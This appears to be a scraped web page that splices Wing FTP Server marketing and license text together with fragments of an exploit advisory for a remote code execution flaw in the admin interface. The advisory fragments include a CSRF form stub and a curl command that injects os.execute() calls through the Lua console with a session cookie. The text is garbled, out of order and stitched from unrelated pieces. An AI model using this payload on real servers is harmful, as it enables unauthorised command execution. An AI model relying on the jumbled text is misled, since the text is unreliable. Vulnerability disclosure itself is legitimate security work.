![]() ![]() If your upgrade protection has expired or will expire soon, please contact us at license key will be sent to you via email within 12 hours after you place the order, please do not block the email address (or To register Wing FTP Server, just open WingFTP's administration and navigate to "Server -> License -> Register. However, if you want to get a longer protection period, you can choose from the options we offer after you click the purchase link. Please note that all the price listed below includes 2-year upgrade protection by default (the software itself never expires, all updates can be downloaded for free within two years). Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. All paid users will get FREE email and remote assistance support for a lifetime. If you need more features available in Standard / Secure / Corporate edition, please purchase a license and register it. After 30 days, you can continue using it as a Free edition for non-commercial use. Wing FTP Server is a highly functional, easy-to-use and secure FTP Server solution that can be used in Windows, Linux, Mac OSX and Solaris. No fix for authenticated RCE at this time.Wing FTP Server is distributed under a shareware license, and you can download and evaluate a fully functional trial version for 30 days. Requests a week delay before public disclosure.ĬSRF attack vector fixed in version 4.4.7. Vulnerability confirmed and new version 4.4.7 released. It supports multiple file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP, giving your clients flexibility in how they connect to the server. Vendor requests clarification on impact and various attack scenarios. File Size: 18.4 MB Wing FTP Server is an easy-to-use, secure, powerful, and free FTP server software for Windows, Linux, Mac OS, and Solaris. Vendor responds with requests for details of vulnerabilities. :5466/admin_lua_script.html" method="POST" enctype="text/plain">ġ) Either utilising the LUA Console interface directly and using the os.execute('') method.Ģ) POST directly using CURL with an authenticated cookie:Ĭurl -i -s -k -X 'POST' -b 'admin_lang=english UIDADMIN=b8b208e2239f462c11641eaa10cde7b0' -data-binary $'command=os.execute(\'cmd.exe\')'Īny OS command can be inserted into the os.execute('') method. ![]() The attack leverages the LUA CLI to inject commands at the same privilege as the web server. ![]() The web client requires that you have Javascript enabled on your browser. The RCE can be exploited in two scenarios, either by a CSRF attack (the admin interface is vulnerable to CSRF attacks) or by being authenticated to the admin interface. Download App VNEWS FTP Server 2003-2021 All Rights Reserved. The admin interface of Wing FTP Server is vulnerable to a Remote Code Execution (RCE) vulnerability. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server." And it provides admins with a web based interface to administrate the server from anywhere. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. "Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. Vulnerability Type: Improper Control of Generation of Code Vulnerable Versions: 4.4.6 and all previous versions It supports multiple file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP, giving your end-users flexibility in how they connect to the server. Change Mirror Download Exploit Title: Wing FTP Server Remote Code Execution vulnerability Wing FTP Server Corporate 6.4.3 Wing FTP Server is a highly functional, easy-to-use and secure FTP Server solution that can be used in Windows, Linux, Mac OSX and Solaris.
0 Comments
Leave a Reply. |